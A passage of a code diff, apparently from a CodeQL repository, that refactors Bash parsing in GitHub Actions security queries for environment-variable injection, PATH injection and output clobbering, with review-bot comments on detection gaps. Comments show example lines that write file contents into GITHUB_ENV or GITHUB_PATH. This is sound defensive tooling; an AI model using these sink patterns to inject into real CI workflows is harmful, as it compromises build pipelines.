"(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + - 
trimQuotes(script.regexpCapture(regexp, 6)) + - // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content - //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) -} - -bindingset[script] -predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) -} - -bindingset[script] -predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) -} - -bindingset[script, file_var] -predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - 
singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) -} - -predicate writeToGitHubEnv(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_ENV", content) -} - -predicate writeToGitHubOutput(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) -} - -predicate writeToGitHubPath(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_PATH", content) -} - -/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ -bindingset[script, file_var] -predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) -} - -predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) -} - -predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) -} - -predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) -} - predicate inPrivilegedContext(AstNode node, Event event) { node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } 
@@ -245,16 +32,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -bindingset[snippet] -predicate outputsPartialFileContent(string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 -} - string defaultBranchNames() { repositoryDataModel(_, result) or 
@@ -321,80 +98,225 @@ module Bash { string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } - bindingset[script] - string getACommand(string script) { - exists(string stmt_, string stmt, string subline2, string cmd | - stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and - stmt = - [ - // $() command substitution - stmt_ - .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", ""), - // `...` command substitution - stmt_ - .regexpFind("\\`[^\\`]+\\`", _, _) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", ""), - // original line with no substitutions - stmt_ - .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") - .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") - ] and - // We shoulg replace quoted arguments with a placeholder to avoid splitting them - // eg: ls | grep -E "*.(tar.gz|zip)$" - //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and - ( - stmt.regexpMatch(".*\"([^\"]+)\".*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), - stmt.regexpFind("\"([^\"]+)\"", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) - or - stmt.regexpMatch(".*'([^']+)'.*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), - stmt.regexpFind("'([^']+)'", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) - or - not stmt.regexpMatch(".*'([^']+)'.*") and - not stmt.regexpMatch(".*\"([^\"]+)\".*") and - subline2 = stmt - ) and - cmd = subline2.splitAt(splitSeparators()).trim() and - // when splitting the line with a separator that is not found, the result is the original line which may contain other separators - // we 
only one the split parts that do not contain any of the separators - not cmd.indexOf(splitSeparators()) > -1 and - not cmd = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", - "case", "esac", "{", "}" - ] and - result = - cmd.replaceAll("::PIPE::", "|") - .replaceAll("::SEMICOLON::", ";") - .replaceAll("::AND::", "&&") - .replaceAll("::OR::", "||") + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... 
+ regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) ) } bindingset[script] - predicate getAnAssignment(string script, string name, string value) { - exists(string stmt | - stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = 
"(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + + // "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + + // ")\n" + + "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + content = + script + 
.regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + bindingset[script, file_var] + predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + 
+ "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) + } + + predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) + } + + predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) + } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.matches("%" + snippet + "%") and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 ) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5b96781a10b..30b57e361ab 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,12 +1319,6 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - string getACommand() { result = Bash::getACommand(this.getScript()) } - - predicate getAnAssignment(string name, string value) { - Bash::getAnAssignment(this.getScript(), name, value) - } - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } 
@@ -1344,6 +1338,194 @@ class RunImpl extends StepImpl { .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") else result = "GITHUB_WORKSPACE/" } + + private string lineProducer(int i) { + result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = 
this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparators()) > -1 + } + + private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + 
this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredQuotedStringLineProducer(int i) { + result = + max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + } + + private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getStmt(int i) { + result = + max(int round, string new | + this.doRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getAStmt() { result = this.getStmt(_) } + + predicate getAssignment(int i, string name, string value) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + + string getCommand(int i) { + result = this.getStmt(i) and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + string getACommand() { result = this.getCommand(_) } + + predicate getAWriteToGitHubEnv(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), 
"GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubPath(string value) { + Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4b8cff4f428..f43d1bdcd87 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,20 +82,17 @@ predicate envToArgInjSink(string var_name, Run run, string command) { */ bindingset[var_name] predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string content, string value | + exists(string value | ( file = "GITHUB_ENV" and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) or file = "GITHUB_OUTPUT" and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubOutput(key, value) or file = "GITHUB_PATH" and - writeToGitHubPath(run, content) and - key = "path" and - value = content + run.getAWriteToGitHubPath(value) and + key = "path" ) and envToRunExpr(var_name, run, value) ) 
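Review bot: `getAssignment` only recognises a statement that begins directly with `NAME=`, so an assignment written as `export FOO=$(cat file)` (or with `local`/`readonly`) yields no `name`/`value` pair, assuming `Bash::splitSeparators()` (not shown in this hunk) does not split on whitespace. The file-read sinks in EnvPathInjectionQuery.qll, EnvVarInjectionQuery.qll and OutputClobberingQuery.qll rely on `run.getAnAssignment(var_name, var_value)`, so scripts written that way would go unreported. Consider allowing an optional prefix in both captures, e.g. `name = stmt.regexpCapture("^(?:(?:export|local|readonly)\\s+)?([a-zA-Z0-9\\-_]+)=.*", 1)` and `value = stmt.regexpCapture("^(?:(?:export|local|readonly)\\s+)?[a-zA-Z0-9\\-_]+=(.*)", 1)`, with a library test covering it. The enclosing class `RunImpl` starts outside the hunk.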
@@ -144,14 +141,13 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and + exists(Run run, string var_name, string key, string value | + run.getAWriteToGitHubEnv(key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - isBashParameterExpansion(value, var_name, _, _) + Bash::isBashParameterExpansion(value, var_name, _, _) ) } 
@@ -178,29 +174,24 @@ predicate controlledCWD(Step artifact) { * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, Step artifact, string content, string key, string value | + exists(Run run, Step artifact, string key, string value | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, Step artifact | + exists(Run run, string key, string value, Step artifact | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" - exists(string var_name, string line, string assignment_regexp, string file_read | - run.getScript().splitAt("\n") = line and - assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and - var_name = line.regexpCapture(assignment_regexp, 1) and - file_read = line.regexpCapture(assignment_regexp, 2) and - outputsPartialFileContent(file_read) and + exists(string var_name, string file_read | + run.getAnAssignment(var_name, file_read) and + Bash::outputsPartialFileContent(run, file_read) and envToRunExpr(var_name, run, value) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) ) or // A file is read and its content is assigned to an output // - run: echo "foo=$(> "$GITHUB_ENV" - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - outputsPartialFileContent(value) + run.getAWriteToGitHubEnv(key, value) and + Bash::outputsPartialFileContent(run, value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and artifact.getAFollowingStep() = run and 
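Review bot: The `Bash::outputsPartialFileContent(run, file_read)` and `Bash::outputsPartialFileContent(run, value)` calls added here pass script text to a helper that builds a `matches` pattern from it (`line.matches("%" + snippet + "%")` in Helper.qll, earlier in this patch). In `matches`, `_` and `%` are wildcards, so a snippet containing them (almost any shell variable name, or an expansion such as `${VAR%%x}`) is not compared literally and can match a different statement, which would produce spurious sinks. A literal containment test avoids that: `exists(line.indexOf(snippet))`. The same calls appear in the EnvPathInjectionQuery.qll, EnvVarInjectionQuery.qll and OutputClobberingQuery.qll hunks; the predicates in this hunk begin and end outside it.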
diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 923d950631d..a80032de320 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -27,19 +27,19 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_PATH - fileToGitHubPath(run, _) + Bash::fileToGitHubPath(run, _) or exists(string value | - writeToGitHubPath(run, value) and + run.getAWriteToGitHubPath(value) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6f325ca4c93..65c6938f0a4 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -29,22 +29,21 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_ENV - fileToGitHubEnv(run, _) + Bash::fileToGitHubEnv(run, _) or - exists(string content, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and + exists(string value | + run.getAWriteToGitHubEnv(_, value) and ( // e.g. // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4a488f945b9..8541286f6e1 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -38,27 +38,25 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( // e.g. // cat test-results/.vars >> $GITHUB_OUTPUT - fileToGitHubOutput(run, _) + Bash::fileToGitHubOutput(run, _) or - exists(string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and + exists(string key, string value | + run.getAWriteToGitHubOutput(key, value) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or @@ -87,9 +85,8 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and exists(run.getInScopeEnvVarExpr(var_name)) and 
